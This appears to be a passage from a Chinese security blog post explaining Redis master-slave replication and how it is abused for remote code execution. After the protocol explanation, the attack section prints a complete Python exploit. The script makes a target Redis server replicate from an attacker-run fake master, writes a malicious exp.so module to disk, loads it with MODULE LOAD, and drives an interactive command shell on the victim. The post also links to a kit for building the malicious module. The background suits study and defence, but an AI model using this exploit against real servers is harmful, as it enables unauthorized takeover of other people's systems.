<p>我们先在同一个机器开两个redis实例，一个端口为6379，一个端口为6380</p>
<pre class=" language-sh"><code class="language-sh">redis-server /etc/redis/redis.conf
redis-server /etc/redis/redis6380.conf
</code></pre>
<p>我们把master_ip设置为<code>127.0.0.1</code>，master_port为<code>6380</code></p>
<pre class=" language-sh"><code class="language-sh">root@kali:/usr/bin# redis-cli -p 6379
127.0.0.1:6379> SLAVEOF 127.0.0.1 6380
OK
127.0.0.1:6379> get test
(nil)
127.0.0.1:6379> exit
root@kali:/usr/bin# redis-cli -p 6380
127.0.0.1:6380> get test
(nil)
127.0.0.1:6380> set test "test"
OK
127.0.0.1:6380> get test
"test"
127.0.0.1:6380> exit
root@kali:/usr/bin# redis-cli -p 6379
127.0.0.1:6379> get test
"test"
</code></pre>
<p>执行一波，我们可以明显看到数据达到了同步的效果.<br>如果我们想解除主从关系可以执行<code>SLAVEOF NO ONE</code></p>
<h3 id="redis-module"><a href="#redis-module" class="headerlink" title="redis module"></a>redis module</h3><p>自从Redis4.x之后redis新增了一个模块功能，Redis模块可以使用外部模块扩展Redis功能，以一定的速度实现新的Redis命令，并具有类似于核心内部可以完成的功能。<br>Redis模块是动态库，可以在启动时或使用<code>MODULE LOAD</code>命令加载到Redis中。</p>
<p>恶意so文件编写：<a href="https://github.com/n0b0dyCN/redis-rogue-server/tree/master/RedisModulesSDK" title="https://github.com/n0b0dyCN/redis-rogue-server/tree/master/RedisModulesSDK" target="_blank" rel="noopener">https://github.com/n0b0dyCN/redis-rogue-server/tree/master/RedisModulesSDK</a></p>
<h3 id="利用原理"><a href="#利用原理" class="headerlink" title="利用原理"></a>利用原理</h3><p>利用步骤，贴一下PPT上的步骤</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190712235651-a9a794c2-a4bd-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>slave和master的握手协议过程</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190713002514-a0feb180-a4c1-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>图中一些常量说明</p>
<pre><code>#define REPL_STATE_CONNECTING 2 /* 等待和master连接 */
/* --- 握手状态开始 --- */
#define REPL_STATE_RECEIVE_PONG 3 /* 等待PING返回 */
#define REPL_STATE_SEND_AUTH 4 /* 发送认证消息 */
#define REPL_STATE_RECEIVE_AUTH 5 /* 等待认证回复 */
#define REPL_STATE_SEND_PORT 6 /* 发送REPLCONF信息，主要是当前实例监听端口 */
#define REPL_STATE_RECEIVE_PORT 7 /* 等待REPLCONF返回 */
#define REPL_STATE_SEND_CAPA 8 /* 发送REPLCONF capa */
#define REPL_STATE_RECEIVE_CAPA 9 /* 等待REPLCONF返回 */
#define REPL_STATE_SEND_PSYNC 10 /* 发送PSYNC */
#define REPL_STATE_RECEIVE_PSYNC 11 /* 等待PSYNC返回 */
/* --- 握手状态结束 --- */
#define REPL_STATE_TRANSFER 12 /* 正在从master接收RDB文件 */
</code></pre><p>我这里主要讲一下最重要的那一步，就是利用全量复制将master上的<code>RDB</code>文件同步到slave上，这一步就是将我们的恶意so文件同步到slave上，从而加载恶意so文件达到rce的目的</p>
<p>那我们为什么一定要用全量复制呢？原因如下。<br>当slave向master发送<code>PSYNC</code>命令之后，一般会得到三种回复：</p>
<ol>
<li>+FULLRESYNC：进行全量复制。</li>
<li>+CONTINUE：进行增量同步。</li>
<li>-ERR：当前master还不支持PSYNC。</li>
</ol>
<p><strong>全量复制的过程：</strong></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190713004119-dfd75b44-a4c3-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<ul>
<li>slave向master发送PSYNC请求，并携带master的runid和offest，如果是第一次连接的话slave不知道master的runid，所以会返回runid为<code>?</code>，offest为<code>-1</code>，我们来测试以下看看是不是真的如此</li>
</ul>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190713004651-a59d01da-a4c4-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<ul>
<li><p>master验证slave发来的runid是否和自身runid一致，如不一致，则进行全量复制，slave并对master发来的runid和offest进行保存</p>
</li>
<li><p>master把自己的runid和offset发给slave</p>
</li>
<li><p>master进行bgsave，生成RDB文件</p>
</li>
<li><p>master将写好的RDB文件传输给slave，并将缓冲区内的数据传输给slave</p>
</li>
<li><p>slave加载RDB文件和缓冲区数据</p>
</li>
</ul>
<p><strong>增量复制（又称部分复制）过程：</strong></p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190713005510-cf74b1aa-a4c5-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<p>增量复制的过程这里简单带过一下：就是当slave向master要求数据同步时，会发送master的runid和offest，如果runid和slave上的不对应则会进行全量复制，如果相同则进行数据同步，但是不会传输RDB文件</p>
<p>通过了解全量复制和增量复制的过程，我们应该大致知道为什么一定要用全量复制而不用增量复制了。</p>
<h3 id="攻击流程"><a href="#攻击流程" class="headerlink" title="攻击流程"></a>攻击流程</h3><ul>
<li>配置一个我们需要以master身份给slave传输so文件的服务，大致流程如下<pre><code>PING 测试连接是否可用
+PONG 告诉slave连接可用
REPLCONF 发送REPLCONF信息，主要是当前实例监听端口
+OK 告诉slave成功接受
REPLCONF 发送REPLCONF capa
+OK 告诉slave成功接受
PSYNC &lt;rundi&gt; &lt;offest&gt; 发送PSYNC
</code></pre>如下图所示：</li>
</ul>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190713014728-1d6e49a0-a4cd-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<ul>
<li>将要攻击的redis服务器设置成我们的slave</li>
</ul>
<pre><code>SLAVEOF ip port
</code></pre><ul>
<li>设置RDB文件<br>PS:这里注意以下exp.so是不能包含路径的，如果需要设置成其它目录请用<code>config set dir path</code></li>
</ul>
<pre><code>config set dbfilename exp.so
</code></pre><ul>
<li>告诉slave使用全量复制并从我们配置的Rouge Server接收module<pre><code>+FULLRESYNC &lt;runid&gt; &lt;offest&gt;\r\n$&lt;len(payload)&gt;\r\n&lt;payload&gt;
</code></pre>PS：其中<code>&lt;runid&gt;</code>无要求，不过长度一般为40，<code>&lt;offest&gt;</code>一般设置为1</li>
</ul>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><p>贴一下exp，写得比较丑，为了节省文章的篇幅其它功能我就没有加上去了，有需要的师傅可以自行添加=。=</p>
<pre class=" language-python"><code class="language-python"><span class="token keyword">import</span> socket
<span class="token keyword">import</span> time

CRLF<span class="token operator">=</span><span class="token string">"\r\n"</span>
payload<span class="token operator">=</span>open<span class="token punctuation">(</span><span class="token string">"exp.so"</span><span class="token punctuation">,</span><span class="token string">"rb"</span><span class="token punctuation">)</span><span class="token punctuation">.</span>read<span class="token punctuation">(</span><span class="token punctuation">)</span>
exp_filename<span class="token operator">=</span><span class="token string">"exp.so"</span>

<span class="token keyword">def</span> <span class="token function">redis_format</span><span class="token punctuation">(</span>arr<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">global</span> CRLF
    <span class="token keyword">global</span> payload
    redis_arr<span class="token operator">=</span>arr<span class="token punctuation">.</span>split<span class="token punctuation">(</span><span class="token string">" "</span><span class="token punctuation">)</span>
    cmd<span class="token operator">=</span><span class="token string">""</span>
    cmd<span class="token operator">+=</span><span class="token string">"*"</span><span class="token operator">+</span>str<span class="token punctuation">(</span>len<span class="token punctuation">(</span>redis_arr<span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token keyword">for</span> x <span class="token keyword">in</span> redis_arr<span class="token punctuation">:</span>
        cmd<span class="token operator">+=</span>CRLF<span class="token operator">+</span><span class="token string">"$"</span><span class="token operator">+</span>str<span class="token punctuation">(</span>len<span class="token punctuation">(</span>x<span class="token punctuation">)</span><span class="token punctuation">)</span><span class="token operator">+</span>CRLF<span class="token operator">+</span>x
    cmd<span class="token operator">+=</span>CRLF
    <span class="token keyword">return</span> cmd

<span class="token keyword">def</span> <span class="token function">redis_connect</span><span class="token punctuation">(</span>rhost<span class="token punctuation">,</span>rport<span class="token punctuation">)</span><span class="token punctuation">:</span>
    sock<span class="token operator">=</span>socket<span class="token punctuation">.</span>socket<span class="token punctuation">(</span><span class="token punctuation">)</span>
    sock<span class="token punctuation">.</span>connect<span class="token punctuation">(</span><span class="token punctuation">(</span>rhost<span class="token punctuation">,</span>rport<span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token keyword">return</span> sock

<span class="token keyword">def</span> <span class="token function">send</span><span class="token punctuation">(</span>sock<span class="token punctuation">,</span>cmd<span class="token punctuation">)</span><span class="token punctuation">:</span>
    sock<span class="token punctuation">.</span>send<span class="token punctuation">(</span>redis_format<span class="token punctuation">(</span>cmd<span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token keyword">print</span><span class="token punctuation">(</span>sock<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">1024</span><span class="token punctuation">)</span><span class="token punctuation">.</span>decode<span class="token punctuation">(</span><span class="token string">"utf-8"</span><span class="token punctuation">)</span><span class="token punctuation">)</span>

<span class="token keyword">def</span> <span class="token function">interact_shell</span><span class="token punctuation">(</span>sock<span class="token punctuation">)</span><span class="token punctuation">:</span>
    flag<span class="token operator">=</span><span class="token boolean">True</span>
    <span class="token keyword">try</span><span class="token punctuation">:</span>
        <span class="token keyword">while</span> flag<span class="token punctuation">:</span>
            shell<span class="token operator">=</span>raw_input<span class="token punctuation">(</span><span class="token string">"\033[1;32;40m[*]\033[0m "</span><span class="token punctuation">)</span>
            shell<span class="token operator">=</span>shell<span class="token punctuation">.</span>replace<span class="token punctuation">(</span><span class="token string">" "</span><span class="token punctuation">,</span><span class="token string">"${IFS}"</span><span class="token punctuation">)</span>
            <span class="token keyword">if</span> shell<span class="token operator">==</span><span class="token string">"exit"</span> <span class="token operator">or</span> shell<span class="token operator">==</span><span class="token string">"quit"</span><span class="token punctuation">:</span>
                flag<span class="token operator">=</span><span class="token boolean">False</span>
            <span class="token keyword">else</span><span class="token punctuation">:</span>
                send<span class="token punctuation">(</span>sock<span class="token punctuation">,</span><span class="token string">"system.exec {}"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>shell<span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token keyword">except</span> KeyboardInterrupt<span class="token punctuation">:</span>
        <span class="token keyword">return</span>


<span class="token keyword">def</span> <span class="token function">RogueServer</span><span class="token punctuation">(</span>lport<span class="token punctuation">)</span><span class="token punctuation">:</span>
    <span class="token keyword">global</span> CRLF
    <span class="token keyword">global</span> payload
    flag<span class="token operator">=</span><span class="token boolean">True</span>
    result<span class="token operator">=</span><span class="token string">""</span>
    sock<span class="token operator">=</span>socket<span class="token punctuation">.</span>socket<span class="token punctuation">(</span><span class="token punctuation">)</span>
    sock<span class="token punctuation">.</span>bind<span class="token punctuation">(</span><span class="token punctuation">(</span><span class="token string">"0.0.0.0"</span><span class="token punctuation">,</span>lport<span class="token punctuation">)</span><span class="token punctuation">)</span>
    sock<span class="token punctuation">.</span>listen<span class="token punctuation">(</span><span class="token number">10</span><span class="token punctuation">)</span>
    clientSock<span class="token punctuation">,</span> address <span class="token operator">=</span> sock<span class="token punctuation">.</span>accept<span class="token punctuation">(</span><span class="token punctuation">)</span>
    <span class="token keyword">while</span> flag<span class="token punctuation">:</span>
        data <span class="token operator">=</span> clientSock<span class="token punctuation">.</span>recv<span class="token punctuation">(</span><span class="token number">1024</span><span class="token punctuation">)</span>
        <span class="token keyword">if</span> <span class="token string">"PING"</span> <span class="token keyword">in</span> data<span class="token punctuation">:</span>
            result<span class="token operator">=</span><span class="token string">"+PONG"</span><span class="token operator">+</span>CRLF
            clientSock<span class="token punctuation">.</span>send<span class="token punctuation">(</span>result<span class="token punctuation">)</span>
            flag<span class="token operator">=</span><span class="token boolean">True</span>
        <span class="token keyword">elif</span> <span class="token string">"REPLCONF"</span> <span class="token keyword">in</span> data<span class="token punctuation">:</span>
            result<span class="token operator">=</span><span class="token string">"+OK"</span><span class="token operator">+</span>CRLF
            clientSock<span class="token punctuation">.</span>send<span class="token punctuation">(</span>result<span class="token punctuation">)</span>
            flag<span class="token operator">=</span><span class="token boolean">True</span>
        <span class="token keyword">elif</span> <span class="token string">"PSYNC"</span> <span class="token keyword">in</span> data <span class="token operator">or</span> <span class="token string">"SYNC"</span> <span class="token keyword">in</span> data<span class="token punctuation">:</span>
            result <span class="token operator">=</span> <span class="token string">"+FULLRESYNC "</span> <span class="token operator">+</span> <span class="token string">"a"</span> <span class="token operator">*</span> <span class="token number">40</span> <span class="token operator">+</span> <span class="token string">" 1"</span> <span class="token operator">+</span> CRLF
            result <span class="token operator">+=</span> <span class="token string">"$"</span> <span class="token operator">+</span> str<span class="token punctuation">(</span>len<span class="token punctuation">(</span>payload<span class="token punctuation">)</span><span class="token punctuation">)</span> <span class="token operator">+</span> CRLF
            result <span class="token operator">=</span> result<span class="token punctuation">.</span>encode<span class="token punctuation">(</span><span class="token punctuation">)</span>
            result <span class="token operator">+=</span> payload
            result <span class="token operator">+=</span> CRLF
            clientSock<span class="token punctuation">.</span>send<span class="token punctuation">(</span>result<span class="token punctuation">)</span>
            flag<span class="token operator">=</span><span class="token boolean">False</span>

<span class="token keyword">if</span> __name__<span class="token operator">==</span><span class="token string">"__main__"</span><span class="token punctuation">:</span>
    lhost<span class="token operator">=</span><span class="token string">"192.168.163.132"</span>
    lport<span class="token operator">=</span><span class="token number">6666</span>
    rhost<span class="token operator">=</span><span class="token string">"192.168.163.128"</span>
    rport<span class="token operator">=</span><span class="token number">6379</span>
    passwd<span class="token operator">=</span><span class="token string">""</span>
    redis_sock<span class="token operator">=</span>redis_connect<span class="token punctuation">(</span>rhost<span class="token punctuation">,</span>rport<span class="token punctuation">)</span>
    <span class="token keyword">if</span> passwd<span class="token punctuation">:</span>
        send<span class="token punctuation">(</span>redis_sock<span class="token punctuation">,</span><span class="token string">"AUTH {}"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>passwd<span class="token punctuation">)</span><span class="token punctuation">)</span>
    send<span class="token punctuation">(</span>redis_sock<span class="token punctuation">,</span><span class="token string">"SLAVEOF {} {}"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>lhost<span class="token punctuation">,</span>lport<span class="token punctuation">)</span><span class="token punctuation">)</span>
    send<span class="token punctuation">(</span>redis_sock<span class="token punctuation">,</span><span class="token string">"config set dbfilename {}"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>exp_filename<span class="token punctuation">)</span><span class="token punctuation">)</span>
    time<span class="token punctuation">.</span>sleep<span class="token punctuation">(</span><span class="token number">2</span><span class="token punctuation">)</span>
    RogueServer<span class="token punctuation">(</span>lport<span class="token punctuation">)</span>
    send<span class="token punctuation">(</span>redis_sock<span class="token punctuation">,</span><span class="token string">"MODULE LOAD ./{}"</span><span class="token punctuation">.</span>format<span class="token punctuation">(</span>exp_filename<span class="token punctuation">)</span><span class="token punctuation">)</span>
    interact_shell<span class="token punctuation">(</span>redis_sock<span class="token punctuation">)</span>
</code></pre>
<p>效果图</p>
<figure class="image-bubble">
                <div class="img-lightbox">
                    <div class="overlay"></div>
                    <img src="https://xzfile.aliyuncs.com/media/upload/picture/20190712154011-4783cdd2-a478-1.png" alt="image.png" title="">
                </div>
                <div class="image-caption">image.png</div>
            </figure>
<h1 id="Reference"><a href="#Reference" class="headerlink" title="Reference"></a>Reference</h1><p><a href="https://redis.io/topics/protocol" title="https://redis.io/topics/protocol" target="_blank" rel="noopener">https://redis.io/topics/protocol</a><br><a href="https://www.cnblogs.com/kismetv/p/9236731.html#t1" title="https://www.cnblogs.com/kismetv/p/9236731.html#t1" target="_blank" rel="noopener">https://www.cnblogs.com/kismetv/p/9236731.html#t1</a><br><a href="http://duqingfeng.net/2018/06/08/Redis%E4%B8%BB%E4%BB%8E%E5%A4%8D%E5%88%B6%E2%80%94%E2%80%94%E5%85%A8%E9%87%8F%E5%A4%8D%E5%88%B6%E4%B8%8E%E5%A2%9E%E9%87%8F%E5%A4%8D%E5%88%B6%E6%80%BB%E7%BB%93/" title="http://duqingfeng.net/2018/06/08/Redis%E4%B8%BB%E4%BB%8E%E5%A4%8D%E5%88%B6%E2%80%94%E2%80%94%E5%85%A8%E9%87%8F%E5%A4%8D%E5%88%B6%E4%B8%8E%E5%A2%9E%E9%87%8F%E5%A4%8D%E5%88%B6%E6%80%BB%E7%BB%93/" target="_blank" rel="noopener">http://duqingfeng.net/2018/06/08/Redis%E4%B8%BB%E4%BB%8E%E5%A4%8D%E5%88%B6%E2%80%94%E2%80%94%E5%85%A8%E9%87%8F%E5%A4%8D%E5%88%B6%E4%B8%8E%E5%A2%9E%E9%87%8F%E5%A4%8D%E5%88%B6%E6%80%BB%E7%BB%93/</a><br><a href="https://www.cnblogs.com/hongmoshui/p/10594639.html" title="https://www.cnblogs.com/hongmoshui/p/10594639.html" target="_blank" rel="noopener">https://www.cnblogs.com/hongmoshui/p/10594639.html</a><br><a href="https://xz.aliyun.com/t/5616" title="https://xz.aliyun.com/t/5616" target="_blank" rel="noopener">https://xz.aliyun.com/t/5616</a><br><a href="https://joychou.org/web/hackredis-enhanced-edition-script.html" title="https://joychou.org/web/hackredis-enhanced-edition-script.html" target="_blank" rel="noopener">https://joychou.org/web/hackredis-enhanced-edition-script.html</a></p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
        </div>

        <blockquote class="post-copyright">
    
    <div class="content">
        
<span class="post-time">
    最后更新时间：<time datetime="2019-07-16T06:59:32.821Z" itemprop="dateUpdated">2019-07-16 14:59:32</time>
</span><br>


        
        know it then hack it
        
    </div>
    
    <footer>
        <a href="https://byqiyou.github.io">
            <img src="/img/avatar.jpg" alt="七友">
            七友
        </a>
    </footer>
</blockquote>

        
<div class="page-reward">
    <a id="rewardBtn" href="javascript:;" class="page-reward-btn waves-effect waves-circle waves-light">赏</a>
</div>



        <div class="post-footer">
            
	<ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Redis/">Redis</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/SSRF/">SSRF</a></li></ul>


            
<div class="page-share-wrap">
    

<div class="page-share" id="pageShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://byqiyou.github.io/2019/07/15/浅析Redis中SSRF的利用/&title=《浅析Redis中SSRF的利用》 — 七友&pic=https://byqiyou.github.io/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://byqiyou.github.io/2019/07/15/浅析Redis中SSRF的利用/&title=《浅析Redis中SSRF的利用》 — 七友&source=路漫漫其修远兮，吾将上下而求索" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://byqiyou.github.io/2019/07/15/浅析Redis中SSRF的利用/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《浅析Redis中SSRF的利用》 — 七友&url=https://byqiyou.github.io/2019/07/15/浅析Redis中SSRF的利用/&via=https://byqiyou.github.io" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://byqiyou.github.io/2019/07/15/浅析Redis中SSRF的利用/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>



    <a href="javascript:;" id="shareFab" class="page-share-fab waves-effect waves-circle">
        <i class="icon icon-share-alt icon-lg"></i>
    </a>
</div>



        </div>
    </div>

    
<nav class="post-nav flex-row flex-justify-between">
  
    <div class="waves-block waves-effect prev">
      <a href="/2019/08/20/SUCTF2019-WEB-WP/" id="post-prev" class="post-nav-link">
        <div class="tips"><i class="icon icon-angle-left icon-lg icon-pr"></i> Prev</div>
        <h4 class="title">SUCTF2019-WEB-WP</h4>
      </a>
    </div>
  

  
    <div class="waves-block waves-effect next">
      <a href="/2019/06/26/mysql中延时注入的5种姿势/" id="post-next" class="post-nav-link">
        <div class="tips">Next <i class="icon icon-angle-right icon-lg icon-pl"></i></div>
        <h4 class="title">MySQL中延时注入的5种姿势</h4>
      </a>
    </div>
  
</nav>



    


<section class="comments" id="comments">
    <div id="disqus_thread"></div>
    <script>
    var disqus_shortname = 'true';
    lazyScripts.push('//' + disqus_shortname + '.disqus.com/embed.js')
    </script>
    <noscript>Please enable JavaScript to view the <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a></noscript>
</section>



















</article>

<div id="reward" class="page-modal reward-lay">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <h3 class="reward-title">
        <i class="icon icon-quote-left"></i>
        Thinks
        <i class="icon icon-quote-right"></i>
    </h3>
    <div class="reward-content">
        
        <div class="reward-code">
            <img id="rewardCode" src="/img/2.png" alt="打赏二维码">
        </div>
        
        <label class="reward-toggle">
            <input id="rewardToggle" type="checkbox" class="reward-toggle-check"
                data-wechat="/img/2.png" data-alipay="/img/alipay.jpg">
            <div class="reward-toggle-ctrol">
                <span class="reward-toggle-item wechat">微信</span>
                <span class="reward-toggle-label"></span>
                <span class="reward-toggle-item alipay">支付宝</span>
            </div>
        </label>
        
    </div>
</div>



</div>

        <footer class="footer">
    <div class="top">
        
<p>
    <span id="busuanzi_container_site_uv" style='display:none'>
        站点总访客数：<span id="busuanzi_value_site_uv"></span>
    </span>
    <span id="busuanzi_container_site_pv" style='display:none'>
        站点总访问量：<span id="busuanzi_value_site_pv"></span>
    </span>
</p>


        <p>
            
            <span>博客内容遵循 <a rel="license" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh">知识共享 署名 - 非商业性 - 相同方式共享 4.0 国际协议</a></span>
        </p>
    </div>
    <div class="bottom">
        <p><span>七友 &copy; 2015 - 2019</span>
            <span>
                
                Power by <a href="http://hexo.io/" target="_blank">Hexo</a> Theme <a href="https://github.com/yscoder/hexo-theme-indigo" target="_blank">indigo</a>
            </span>
        </p>
    </div>
</footer>

    </main>
    <div class="mask" id="mask"></div>
<a href="javascript:;" id="gotop" class="waves-effect waves-circle waves-light"><span class="icon icon-lg icon-chevron-up"></span></a>



<div class="global-share" id="globalShare">
    <ul class="reset share-icons">
      <li>
        <a class="weibo share-sns" target="_blank" href="http://service.weibo.com/share/share.php?url=https://byqiyou.github.io/2019/07/15/浅析Redis中SSRF的利用/&title=《浅析Redis中SSRF的利用》 — 七友&pic=https://byqiyou.github.io/img/avatar.jpg" data-title="微博">
          <i class="icon icon-weibo"></i>
        </a>
      </li>
      <li>
        <a class="weixin share-sns wxFab" href="javascript:;" data-title="微信">
          <i class="icon icon-weixin"></i>
        </a>
      </li>
      <li>
        <a class="qq share-sns" target="_blank" href="http://connect.qq.com/widget/shareqq/index.html?url=https://byqiyou.github.io/2019/07/15/浅析Redis中SSRF的利用/&title=《浅析Redis中SSRF的利用》 — 七友&source=路漫漫其修远兮，吾将上下而求索" data-title=" QQ">
          <i class="icon icon-qq"></i>
        </a>
      </li>
      <li>
        <a class="facebook share-sns" target="_blank" href="https://www.facebook.com/sharer/sharer.php?u=https://byqiyou.github.io/2019/07/15/浅析Redis中SSRF的利用/" data-title=" Facebook">
          <i class="icon icon-facebook"></i>
        </a>
      </li>
      <li>
        <a class="twitter share-sns" target="_blank" href="https://twitter.com/intent/tweet?text=《浅析Redis中SSRF的利用》 — 七友&url=https://byqiyou.github.io/2019/07/15/浅析Redis中SSRF的利用/&via=https://byqiyou.github.io" data-title=" Twitter">
          <i class="icon icon-twitter"></i>
        </a>
      </li>
      <li>
        <a class="google share-sns" target="_blank" href="https://plus.google.com/share?url=https://byqiyou.github.io/2019/07/15/浅析Redis中SSRF的利用/" data-title=" Google+">
          <i class="icon icon-google-plus"></i>
        </a>
      </li>
    </ul>
 </div>


<div class="page-modal wx-share" id="wxShare">
    <a class="close" href="javascript:;"><i class="icon icon-close"></i></a>
    <p>扫一扫，分享到微信</p>
    <img src="//api.qrserver.com/v1/create-qr-code/?data=https://byqiyou.github.io/2019/07/15/浅析Redis中SSRF的利用/" alt="微信分享二维码">
</div>




    <script src="//cdn.bootcss.com/node-waves/0.7.4/waves.min.js"></script>
<script>
var BLOG = { ROOT: '/', SHARE: true, REWARD: true };


</script>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/main.min.js"></script>


<div class="search-panel" id="search-panel">
    <ul class="search-result" id="search-result"></ul>
</div>
<template id="search-tpl">
<li class="item">
    <a href="{path}" class="waves-block waves-effect">
        <div class="title ellipsis" title="{title}">{title}</div>
        <div class="flex-row flex-middle">
            <div class="tags ellipsis">
                {tags}
            </div>
            <time class="flex-col time">{date}</time>
        </div>
    </a>
</li>
</template>

<script src="//unpkg.com/hexo-theme-material-indigo@latest/js/search.min.js" async></script>






<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>



<script>
(function() {
    var OriginTitile = document.title, titleTime;
    document.addEventListener('visibilitychange', function() {
        if (document.hidden) {
            document.title = '死鬼去哪里了！';
            clearTimeout(titleTime);
        } else {
            document.title = '(つェ⊂)咦!又好了!';
            titleTime = setTimeout(function() {
                document.title = OriginTitile;
            },2000);
        }
    });
})();
</script>



</body>
</html>
